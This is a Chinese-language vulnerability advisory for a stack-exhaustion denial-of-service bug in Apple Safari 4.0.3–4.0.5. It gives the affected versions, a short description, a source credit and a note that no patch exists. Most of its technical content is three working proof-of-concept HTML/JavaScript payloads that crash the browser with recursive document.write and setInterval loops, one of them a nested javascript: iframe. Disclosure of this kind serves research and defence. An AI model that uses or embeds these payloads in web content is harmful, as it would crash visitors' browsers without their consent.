Safari浏览器栈耗尽拒绝服务漏洞

受影响系统:

Apple Safari 4.0.5
Apple Safari 4.0.4
Apple Safari 4.0.3

描述:

Safari是苹果家族机器操作系统中默认捆绑的WEB浏览器。

用户受骗使用Safari浏览器访问了恶意网页就可能耗尽所有可用栈资源,导致浏览器崩溃。

<*来源:Mathias Karlsson
  
  链接:
http://h.ackack.net/?p=258
*>

测试方法:
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<script>  

  a="<script>var b=\"<iframe src=’javascript:window.location=\"boom\"’></iframe>\";while(1){b=b+b;document.write(b);}</scr"+"ipt>";  

  while(1){  

    a=a+a;  

    document.write(a);  

  }  

</script>

<html>  

<script>  

loop1();  

    var a = "<blink>";  

function loop1()  

{  

    document.write(a);  

    setInterval(loop2,0);  

}  

function loop2()  

{  

    document.write(a);  

    setInterval(loop1,0);  

}  

</script>  

</html>

<html>  

<script>  

loop();  

function loop()  

{  

    setInterval(doit,0);  

}  

function doit()  

{  

    var b="<marquee>";  

    document.write(b);  

    setInterval(loop,0);  

}  

</script>  

</html>

建议:

 

厂商补丁:

Apple
—–
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.apple.com

发表评论?

0 条评论。

发表评论